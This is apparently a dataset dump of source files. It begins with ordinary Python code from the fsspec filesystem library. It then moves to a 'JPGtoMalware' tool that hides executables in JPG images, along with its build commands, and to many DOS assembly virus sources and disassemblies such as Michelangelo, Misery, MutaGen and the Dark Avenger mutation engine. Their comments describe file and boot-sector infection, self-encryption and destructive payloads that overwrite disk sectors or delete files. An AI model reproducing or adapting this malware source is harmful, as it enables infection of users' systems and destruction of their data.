text
stringlengths
0
20k
import base64 import io import re import requests import fsspec class JupyterFileSystem(fsspec.AbstractFileSystem): """View of the files as seen by a Jupyter server (notebook or lab)""" protocol = ("jupyter", "jlab") def __init__(self, url, tok=None, **kwargs): """ Parameters ...
from __future__ import annotations import abc import hashlib from fsspec.implementations.local import make_path_posix class AbstractCacheMapper(abc.ABC): """Abstract super-class for mappers from remote URLs to local cached basenames. """ @abc.abstractmethod def __call__(self, path: str) -> str:...
import datetime import logging import os import types import uuid from stat import S_ISDIR, S_ISLNK import paramiko from .. import AbstractFileSystem from ..utils import infer_storage_options logger = logging.getLogger("fsspec.sftp") class SFTPFileSystem(AbstractFileSystem): """Files over SFTP/SSH Peer-to...
# https://hadoop.apache.org/docs/r1.0.4/webhdfs.html import logging import os import secrets import shutil import tempfile import uuid from contextlib import suppress from urllib.parse import quote import requests from ..spec import AbstractBufferedFile, AbstractFileSystem from ..utils import infer_storage_options, ...
import requests from ..spec import AbstractFileSystem from ..utils import infer_storage_options from .memory import MemoryFile class GistFileSystem(AbstractFileSystem): """ Interface to files in a single GitHub Gist. Provides read-only access to a gist's files. Gists do not contain subdirectories, s...
import os import zipfile import fsspec from fsspec.archive import AbstractArchiveFileSystem class ZipFileSystem(AbstractArchiveFileSystem): """Read/Write contents of ZIP archive as a file-system Keeps file object open while instance lives. This class is pickleable, but not necessarily thread-safe "...
import errno import io import os import secrets import shutil from contextlib import suppress from functools import cached_property, wraps from urllib.parse import parse_qs from fsspec.spec import AbstractFileSystem from fsspec.utils import ( get_package_version_without_import, infer_storage_options, mirro...
from .. import filesystem from ..asyn import AsyncFileSystem class DirFileSystem(AsyncFileSystem): """Directory prefix filesystem The DirFileSystem is a filesystem-wrapper. It assumes every path it is dealing with is relative to the `path`. After performing the necessary paths operation it delegates ...
""" This module contains SMBFileSystem class responsible for handling access to Windows Samba network shares by using package smbprotocol """ import datetime import re import uuid from stat import S_ISDIR, S_ISLNK import smbclient import smbprotocol.exceptions from .. import AbstractFileSystem from ..utils import in...
from typing import ClassVar from fsspec import AbstractFileSystem __all__ = ("ChainedFileSystem",) class ChainedFileSystem(AbstractFileSystem): """Chained filesystem base class. A chained filesystem is designed to be layered over another FS. This is useful to implement things like caching. This ba...
from __future__ import annotations import os import pickle import time from typing import TYPE_CHECKING from fsspec.utils import atomic_write try: import ujson as json except ImportError: if not TYPE_CHECKING: import json if TYPE_CHECKING: from collections.abc import Iterator from typing imp...
from __future__ import annotations import base64 import urllib import requests from requests.adapters import HTTPAdapter, Retry from typing_extensions import override from fsspec import AbstractFileSystem from fsspec.spec import AbstractBufferedFile class DatabricksException(Exception): """ Helper class fo...
from __future__ import annotations import logging from datetime import datetime, timezone from errno import ENOTEMPTY from io import BytesIO from pathlib import PurePath, PureWindowsPath from typing import Any, ClassVar from fsspec import AbstractFileSystem from fsspec.implementations.local import LocalFileSystem fro...
from contextlib import contextmanager from ctypes import ( CFUNCTYPE, POINTER, c_int, c_longlong, c_void_p, cast, create_string_buffer, ) import libarchive import libarchive.ffi as ffi from fsspec import open_files from fsspec.archive import AbstractArchiveFileSystem from fsspec.implementa...
import io import json import warnings from .core import url_to_fs from .utils import merge_offset_ranges # Parquet-Specific Utilities for fsspec # # Most of the functions defined in this module are NOT # intended for public consumption. The only exception # to this is `open_parquet_file`, which should be used # place...
import operator from fsspec import AbstractFileSystem from fsspec.utils import tokenize class AbstractArchiveFileSystem(AbstractFileSystem): """ A generic superclass for implementing Archive-based filesystems. Currently, it is shared amongst :class:`~fsspec.implementations.zip.ZipFileSystem`, :c...
from collections import deque class Transaction: """Filesystem transaction write context Gathers files for deferred commit or discard, so that several write operations can be finalized semi-atomically. This works by having this instance as the ``.transaction`` attribute of the given filesystem ""...
from __future__ import annotations import inspect import logging import os import shutil import uuid from .asyn import AsyncFileSystem, _run_coros_in_chunks, sync_wrapper from .callbacks import DEFAULT_CALLBACK from .core import filesystem, get_filesystem_class, split_protocol, url_to_fs _generic_fs = {} logger = lo...
import ast import contextlib import logging import os import re from collections.abc import Sequence from typing import ClassVar import panel as pn from .core import OpenFile, get_filesystem_class, split_protocol from .registry import known_implementations pn.extension() logger = logging.getLogger("fsspec.gui") cl...
from __future__ import annotations import configparser import json import os import warnings from typing import Any conf: dict[str, dict[str, Any]] = {} default_conf_dir = os.path.join(os.path.expanduser("~"), ".config/fsspec") conf_dir = os.environ.get("FSSPEC_CONFIG_DIR", default_conf_dir) def set_conf_env(conf_d...
from . import caching from ._version import __version__ # noqa: F401 from .callbacks import Callback from .compression import available_compressions from .core import get_fs_token_paths, open, open_files, open_local, url_to_fs from .exceptions import FSTimeoutError from .mapping import FSMap, get_mapper from .registry...
import array import logging import posixpath import warnings from collections.abc import MutableMapping from functools import cached_property from fsspec.core import url_to_fs logger = logging.getLogger("fsspec.mapping") class FSMap(MutableMapping): """Wrap a FileSystem instance as a mutable wrapping. The ...
import argparse import logging import os import stat import threading import time from errno import EIO, ENOENT from fuse import FUSE, FuseOSError, LoggingMixIn, Operations from fsspec import __version__ from fsspec.core import url_to_fs logger = logging.getLogger("fsspec.fuse") class FUSEr(Operations): def __...
"""Helper functions for a standard streaming compression API""" from zipfile import ZipFile import fsspec.utils from fsspec.spec import AbstractBufferedFile def noop_file(file, mode, **kwargs): return file # TODO: files should also be available as contexts # should be functions of the form func(infile, mode=,...
""" fsspec user-defined exception classes """ import asyncio class BlocksizeMismatchError(ValueError): """ Raised when a cached file is opened with a different blocksize than it was written with """ class FSTimeoutError(asyncio.TimeoutError): """ Raised when a fsspec function timed out occu...
import os import shutil import subprocess import sys import time from collections import deque from collections.abc import Generator, Sequence import pytest import fsspec @pytest.fixture() def m(): """ Fixture providing a memory filesystem. """ m = fsspec.filesystem("memory") m.store.clear() ...
# file generated by setuptools-scm # don't change, don't track in version control __all__ = [ "__version__", "__version_tuple__", "version", "version_tuple", "__commit_id__", "commit_id", ] TYPE_CHECKING = False if TYPE_CHECKING: from typing import Tuple from typing import Union V...
import pytest class AbstractOpenTests: def test_open_exclusive(self, fs, fs_target): with fs.open(fs_target, "wb") as f: f.write(b"data") with fs.open(fs_target, "rb") as f: assert f.read() == b"data" with pytest.raises(FileExistsError): fs.open(fs_targe...
import os import pytest import fsspec def test_move_raises_error_with_tmpdir(tmpdir): # Create a file in the temporary directory source = tmpdir.join("source_file.txt") source.write("content") # Define a destination that simulates a protected or invalid path destination = tmpdir.join("non_exist...
from hashlib import md5 from itertools import product import pytest from fsspec.tests.abstract.common import GLOB_EDGE_CASES_TESTS class AbstractCopyTests: def test_copy_file_to_existing_directory( self, fs, fs_join, fs_bulk_operations_scenario_0, fs_target, suppo...
GLOB_EDGE_CASES_TESTS = { "argnames": ("path", "recursive", "maxdepth", "expected"), "argvalues": [ ("fil?1", False, None, ["file1"]), ("fil?1", True, None, ["file1"]), ("file[1-2]", False, None, ["file1", "file2"]), ("file[1-2]", True, None, ["file1", "file2"]), ("*", Fa...
import os from hashlib import md5 import pytest from fsspec.implementations.local import LocalFileSystem from fsspec.tests.abstract.copy import AbstractCopyTests # noqa: F401 from fsspec.tests.abstract.get import AbstractGetTests # noqa: F401 from fsspec.tests.abstract.open import AbstractOpenTests # noqa: F401 fr...
import pytest class AbstractPipeTests: def test_pipe_exclusive(self, fs, fs_target): fs.pipe_file(fs_target, b"data") assert fs.cat_file(fs_target) == b"data" with pytest.raises(FileExistsError): fs.pipe_file(fs_target, b"data", mode="create") fs.pipe_file(fs_target, b"...
from __future__ import annotations import importlib import types import warnings __all__ = ["registry", "get_filesystem_class", "default"] # internal, mutable _registry: dict[str, type] = {} # external, immutable registry = types.MappingProxyType(_registry) default = "file" def register_implementation(name, cls, ...
import json from collections.abc import Mapping, Sequence from contextlib import suppress from pathlib import PurePath from typing import ( Any, Callable, ClassVar, Optional, ) from .registry import _import_class, get_filesystem_class from .spec import AbstractFileSystem class FilesystemJSONEncoder(j...
from functools import wraps class Callback: """ Base class and interface for callback mechanism This class can be used directly for monitoring file transfers by providing ``callback=Callback(hooks=...)`` (see the ``hooks`` argument, below), or subclassed for more specialised behaviour. Param...
certifi
# JPGtoMalware It embeds the executable file or payload inside the jpg file. The method the program uses isn't exactly called one of the steganography methods [secure cover selection, least significant bit, palette-based technique, etc ]. For this reason, it does not cause any distortion in the JPG file. The JPG file ...
####################################################################################### # # malware_v2.py (Malware v2) [ Main Program ] # © 2022 ABDULKADİR GÜNGÖR All Rights Reserved # Contact email address: abdulkadir_gungor@outlook.com # # Developper: Abdulkadir GÜNGÖR (abdulkadir_gungor@outlook.com) # Date: 05...
####################################################################################### # # InjectingMalwareIntoJPG.py (Injecting Malware Into JPG File) [ Main Program ] # © 2022 ABDULKADİR GÜNGÖR All Rights Reserved # Contact email address: abdulkadir_gungor@outlook.com # # Developper: Abdulkadir GÜNGÖR (abdulka...
(Program that produces jpg with malware) pyinstaller --onefile --icon=InjectingMalwareIntoJPG.ico InjectingMalwareIntoJPG.py (Malware) pyinstaller --onefile --noconsole --icon=malware.ico malware_v1.py pyinstaller --onefile --noconsole --icon=malware.ico malware_v2.py pyinstaller --onefile --noconsole --icon=...
--- YASAL UYARI --- 1) Yazılımı indirmek ve kullanmak isteyenler lisans anlaşmasını kabul etmiş sayılır. 2) Yazılım ile ilgili yaşanabilecek tüm olumsuz durumlar, zararlar ve yasal olaylar yazılımı kullanan ve çalıştıranlara aittir. Program konusunda hiçbir garanti verilmemektedir. 3) Eğitim amacıyla program ...
####################################################################################### # # malware_v3.py (Malware v3) [ Main Program ] # © 2022 ABDULKADİR GÜNGÖR All Rights Reserved # Contact email address: abdulkadir_gungor@outlook.com # # Developper: Abdulkadir GÜNGÖR (abdulkadir_gungor@outlook.com) # Date: 05...
"JPGtoMalware" LICENCE AGREEMENT ------------------------------------------ "JPGtoMalware" was developed by Abdulkadir Güngör © 2022 ABDULKADİR GÜNGÖR All Rights Reserved Contact email address: abdulkadir_gungor@outlook.com This licence agreement only applies to this software and source code. TERMS AND CONDITIONS --...
####################################################################################### # # malware_v1.py (Malware v1) [ Main Program ] # © 2022 ABDULKADİR GÜNGÖR All Rights Reserved # Contact email address: abdulkadir_gungor@outlook.com # # Developper: Abdulkadir GÜNGÖR (abdulkadir_gungor@outlook.com) # Date: 05...
; VirusName: Misery ; Country : Sweden ; Author : Metal Militia / Immortal Riot ; Date : 07-22-1993 ; ; This is an mutation of Leprosy from 'PCM2'. ; Many thanks to the scratch coder of Leprosy ; ; We've tried this virus ourself, and it works just fine. ; It copies itself into other exe/com files on the ; curren...
; MutaGenic Agent - MutaGen Test Virus ; by MnemoniX 1994 ; ; This is an ordinary run-of-the-mill virus that infects a .COM file in ; the current directory on run and uses MutaGen to encrypt itself. MGEN_SIZE equ 1032 ; size of MutaGen ID equ 'MG' ; ID word MAX_INFECTI...
.model tiny ;Sets memory model for TASM .radix 16 ;Sets default number system to hexidecimal (base 16) .code ;starts code section org 100 ;makes program begin at 100h, i.e. a .COM file start: ...
; Virusname: Multi-Flu ; Origin : Sweden ; Author : Metal Militia/Immortal Riot ; ; Multi-Flu's a resident infector of .COM files (w/the exception of ; COMMAND.COM when they're executed. If the date's the first of any ; month it'll overwrite 9999 sectors on the C: drive, thereby rendering ; it useless. After this...
;****************************************************************************; ; ; ; -=][][][][][][][][][][][][][][][=- ; ; -=] P E R F E C T C R I M E [=- ; ; ...
; DeathHog, (will defeat read-only files and appends itself to all ; files) ; Originally based upon DeathCow (C) 1991 by Nowhere Man and [NuKE] WaErZ ; r/w access, nuisance routines supplied by KOUCH ; ; Appended by Kouch, derived from DeathCow/Define (author unknown) virus_length equ finish - start code ...
;well, here's the next installment of the merde virus...all that is new; ;is your run of the mill xor encryption........and a little change in; ;the code itself to make it slightly more modular...; ;up+coming: .exe version(why put 'em together? makes it too big); ; an actual function besides infect!; ; TSR infect ver...
; ;Happy Birthday Robbie Virus ; code segment 'CODE' assume cs:code,ds:code,es:code,ss:code org 0100h code_length equ finish - start lf equ 0Ah cr equ 0Dh start label near id_bytes proc near mov si,si ...
page ,132 name mutate title MUTATE - A Self-mutating Module for Viruses .radix 16 .model tiny .code ; This source code is a copyrighted material ; (C) 1990 DARK AVENGER org 100 timer equ 46C start: jmp prog ; v_entry. ; , JMP-a, ; 100, .. .COM . v_entry: xchg ax,bp mov si,100 ...
;My Little Pony v1.00 disassembly - sort of. ;By Cruel Entity of ANOI. Related to CyberCide. ;Well, the comments are a bit bitchy, probably coz I was in a really ;really bad mood when I wrote them. The virus author, Cruel Entity, ;knows how to make a nice virus, he just doesn't have enough assembly ;experience to make...
; File: MIR.COM ; File Type: COM ; Processor: 8086/87/88 ; Range: 00100h to 007d3h ; Memory Needed: 2 Kb ; Initial Stack: 0000:fffe ; Entry Point: 0000:0100 ; Subroutines: 11 .radix 16 cseg segment para public 'CODE' assume cs:cseg,ds:cseg,es:cseg,ss:cseg org 0100h ; >>>> starts execution here <<<< o001...
;********************************************************************** ;* ;* MK Worm ;* ;* Compile with MASM 4.0 ;* ;********************************************************************** cseg segment assume cs:cseg,ds:cseg,es:cseg .radix 16 org 0100 ...
;*************************************************************** ; DISASSEMBLY of the MINI-45 VIRUS ;*************************************************************** ; FIND .COM FILE TO INFECT ;*************************************************************** MOV DX, 127h ;filehandle sear...
; This is a disassembly of the much-hyped michelangelo virus. ; As you can see, it is a derivative of the Stoned virus. The ; junk bytes at the end of the file are probably throwbacks to ; the Stoned virus. In any case, it is yet another boot sector ; and partition table infector. michelangelo segment byte publi...
; "Marauder" Virus ; AKA Deadpool-B ; ; By Hellraiser ; Of Phalcon/Skism ; ; For virus reseach only ; ; I always wanted to release this source, so here it is. Now that it's been caught ; take a look at whats inside. ; ; I know it's no great thing, but it's good to learn from. It contains basic ; encryption, mutation...
;**************************************************************************** ;* The Mutating Interrupt Virus -Soltan Griss- ;* [RABID] -=+ Front 242 +=- ;* ;* ;* Well this is my Third Release of many to come. This virus uses the latest ;* of RABI...
; (C) Copyright VirusSoft Corp. Aug, 1990 ofs = 201h len = offset end-ofs start: call $+6 org ofs first: dw 020cdh db 0 xchg ax,dx pop di dec di dec di mov si,[di] dec di add si,di ...
; (C) Copyright VirusSoft Corp. Sep., 1990 ; ; This is the SOURCE file of last version of MASTER,(V500),(MG) ect. ; virus, distributed by VirusSoft company . First version was made ; in May., 1990 . Please don't make any corections in this file ! ; ; Bulgaria, Varna ; ...
CODE_SEG SEGMENT ORG 100H ;ORG 100H for a .com file ASSUME CS:CODE_SEG,DS:CODE_SEG FIRST: JMP ENTRY ;Skip over data area COPYRIGHT DB '(C) S. HOLZNER 1984' TARGET_FCB DB 37 DUP(0) ;FCB at 6CH will be written over ...
; The Mindless V1.0 Virus ; ; Type: *.COM Overwriter ; ; Programmer: Natas Kaupas ; Notes: ; ; Read the texts that come with this for all of the necessary ; info...if you've got any questions contact me on any YAM Dist. Sites. ; ; I Couldn't Have Made This Without: ; ; Soltan Griss -Kode4 ; Data Disruptor -encr...
; MINI-35 is Copyright (C) by Line Noise 1992... ; You are allowed to use this code in your own ; programs if you want, you are allowed to ; give this source away, sell it or whatever... ; None of the members of Line Noise should be held ; responsible for the consequences of the use ; of this program.... ; Use this pro...
code segment assume cs:code org 100h prog: mov cx,(offset last - offset main + 1) / 2 mov dx,0 mov si,offset main cmp ax,0 xor cx,0 nop xor si,0 nop l103: inc ax l102: inc bp l101: clc l100: x...
; Miniscule: the world's smallest generic virus (only 31 bytes long!) ; (C) 1992 Nowhere Man and [NuKE] WaReZ ; Written on January 22, 1991 code segment 'CODE' assume cs:code,ds:code,es:code,ss:code org 0100h main proc near ; Find the name of the first file and return it in the DTA. No checking ; is done f...
TITLE MICHELANGELO, a STONED - derived Boot Virus SUBTTL reverse engineered source code for MASM 5.1/6.0 PAGE 60,132 .RADIX 16 IF1 %Out VIRAL SOFTWARE, DO NOT DISTRIBUTE WITHOUT NOTIFICATION ͻ %Out %Out Ŀ %Out Ĵ M I C H E L A N ...
; McWhale.asm : [McAfee' Whale] by [pAgE] ; Created wik the Phalcon/Skism Mass-Produced Code Generator ; from the configuration file skeleton.cfg ; ; Here's another "lame dick" virus! I thought it was rather fitting! ; Many thanks to the fellows at Phalcon/Skism for this little tool. ; I am sure that Dark Angel and the...
; Virusname : Marked-X ; Virusauthor: Metal Militia ; Virusgroup : Immortal Riot ; Origin : Sweden ; ; It's a TSR, overwriting infector on files executed. If it's the ; twenty-first of any month it'll print a note and beep one thousand ; times. It also sets time/date to 00-00-00 so nothing will be shown ; in the f...
;Ŀ ; Glenns Revenge (Morgoth) ;Ĵ ; This will be a Parasytic Non-Resident .COM infector. ; It will also infect COMMAND.COM. ; ; ; ; ; ; ; This will contain the segment status, original start, pre-defin...
; MERDE-3: A resident, non-overwriting .Com infector by the loki-nator ;Well, here it is, for what it's worth.. It is really kind of a ;piece of crap, but it is just a rough draft.. ;NOTES: ; If this gets into Command.Com, it (command) won't work for unknown reasons.. ; I could have fixed it by just checking to...
;****************************************************************************** ; The High Evolutionary's [MeGaTrOjAn] v1.0 ;****************************************************************************** ; ; Development Notes: (Dec.12.9O) ; ------------------------------ ; ; Hi guys. It's me again. Here is my la...
;**************************************************************************** ;* Mini non-resident virus ;**************************************************************************** cseg segment assume cs:cseg,ds:cseg,es:cseg,ss:cseg .RADIX 16 FILELEN ...
;**************************************************************************** ;* Mini non-resident virus ;**************************************************************************** cseg segment assume cs:cseg,ds:cseg,es:cseg,ss:cseg .RADIX 16 FILELEN ...
title "Memory_Lapse.366A" ;ͻ ; Assembly Source Listing for Memory_Lapse.366A ; Copyright (c) 1993 Memory Lapse. All Rights Reserved. ;Ķ ; The Memory_Lapse.366A Virus is a non-encrypting, time/date stamp saving, ; original attribute retaining, disk transfr ar...
PAGE 59,132 ; ; ; MANG ; ; Created: 30-Aug-92 ; Passes: 5 Analysis Options on: none ; ; data_0001e equ 4Ch data_0002e equ 4Eh main_ram_size_ equ 413h data_0003e equ 7C00h ;* data_0004e equ 7C05h...
; Virusname : Metallic Moonlite ; Virusauthor: Metal Militia ; Virusgroup : Immortal Riot ; Origin : Sweden ; ; It's a non-resident, current dir infector of com-files. every first ; of any month it will put a bit of code resident to make ctrl-alt-del's ; to coldboots and delete all files being executed. It's encry...
; (C) Copyright VirusSoft Corp. Sep., 1990 ; ; This is the SOURCE file of last version of MASTER,(V500),(MG) ect. ; virus, distributed by VirusSoft company . First version was made ; in May., 1990 . Please don't make any corections in this file ! ; ; Bulgaria, Varna ; ...
;****************************************************************** ;* * ;* My First Virus, a simple non-overwriting COM infector * ;* * ;* by, Solomon ...
PAGE 59,132 ; ; ; PROB ; ; Created: 1-Jan-80 ; Version:...
; ; dynamic self loader ; ; ; ; SYSTEM INFECTOR ; ; ; Version 4.00 - Copywrite (c) 1989 by L.Mateew & Jany Brankow ; ; All rights reserved. ; page ,132 title SYSTEM INFECTOR comp13 = offset kt1 - offset org13 comp21 = offset kt1 - offset new21 compbuff = offset kt1 - offset buffer compbuff1 = offs...
; MONOGRAF.DRV -- Lotus Driver for Graphics on Monochrome Display ; ============ ; ; (For use with Lotus 1-2-3 Version 1A) ; ; (C) Copyright Charles Petzold, 1985 CSEG Segment Assume CS:CSEG Org 0 Beginning dw Offset EndDriver,1,1,Offset Initialize Org 18h db "Monochrome Graphics (C) Charles Petzold, 1985"...
; Okay, here is my newest version.. It now ; offers EXE infection. I messed up command.com ; compatibility so this version won't infect it. ; Also, this version might be a little shakey, ; but it should work okay with most setups ; (I'm not professional yet, so screw 'em ; if this hangs!).. ; This will be the last t...
.model tiny .code seg_a segment byte public ASSUME CS:SEG_A, DS:SEG_A org 100h main proc find: mov ah,3bh mov dx,offset win int 21h mov Dx,offset conn mov cx,2h mov ah,4eh int 21h next: ...
ideal p386 model tiny codeseg startupcode n_int=len/4+82h ;MEGAVIR by Mad Daemon @ http://hysteria.sk/maddaemon/ ;Expected values in registers at entry point: bx=0 ch=0 ;Compile to COM call start old_3: int 20h nop start: pop di dec di dec di mov si,[di] ...
; ;============================================================================= ; [Malaria] ; TSR, parasitic, tunneling, sub-stealth, floppy, COM infecting virus ;============================================================================= ; virus_size equ (v_end-v_start) loader_size equ...
;**************************************************************************** ;* Mini non-resident virus ;**************************************************************************** cseg segment assume cs:cseg,ds:cseg,es:cseg,ss:cseg .RADIX 16 FILELEN ...
; (C) Copyright VirusSoft Corp. Sep., 1990 ; ; This is the SOURCE file of last version of MASTER,(V500),(MG) ect. ; virus, distributed by VirusSoft company . First version was made ; in May., 1990 . Please don't make any corections in this file ! ; ; Bulgaria, Varna ; ...
; Stoned.Empire.Monkey.B .model tiny .code virus segment assume cs:virus,ds:virus org 100h begin: jmp short virus_start nop mov ss, ax mov sp, 7c00h mov si, sp push ax pop es push ax pop ds sti cld ...
;****************************************************************************** ;****************************************************************************** ;**** Virus: .COM /noTBAV **** ;**** By: Ramthes Jones **** ;****************************************************************************** ...
PAGE 59,132 ;========================================================================== ;== == ;== MOLESTER == ;== == ;== Created: 18-Apr-92 == ;== Passes: 5 ...
muttiny segment byte public assume cs:muttiny, ds:muttiny org 100h start: db 0e9h, 5, 0 ; jmp startvir restorehere: int 20h idword: dw 990h ; The next line is incredibly pointless. It is a holdover from one ; of the origin...
page ,132 ; ; name: mg-3.vom ; ; program type: com/bin ; ; cpu type: 8086 ; ; program loaded at 0000:01f8 ; ; physical eof at 0000:03f5 ; ; program entry point at 0000:01f8 ; fun segment assume cs:fun,ds:fun,es:fun,ss:fun ; ; references before the start of code space ; org 0006h h_0006 label word org 004ch h_...
; ############################################################################# ; ### ### ; ### M i C R O 29 ### ; ### ### ...
.model tiny .code org 100h start: ;-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=; ; A NEW ORDER OF INTELLIGENCE PRESENTS: ; ; My Little Pony 1.00 ; ; Copyright (c) 1992...
; ** Anti-MIT Virus ** ; To assemble, use TASM and TLINK to create a .COM file. Next ; run the .COM file in the same directory of a file you want to infect. ; Your system may hang, but after re-booting you will notice an increase ; in the target files size. Now debug the newly i...
; Virusname: MultiPlex ; Alias(es): None ; Origin : Sweden ; Author : Metal Militia/Immortal Riot ; ; Thisone's a non-res/non-ow/non-encrypted infector of .COM files which ; travels thrue one directory on your harddrive each time an infected ; file's executed. ; ; I'ts damage routine will be activated if the date's...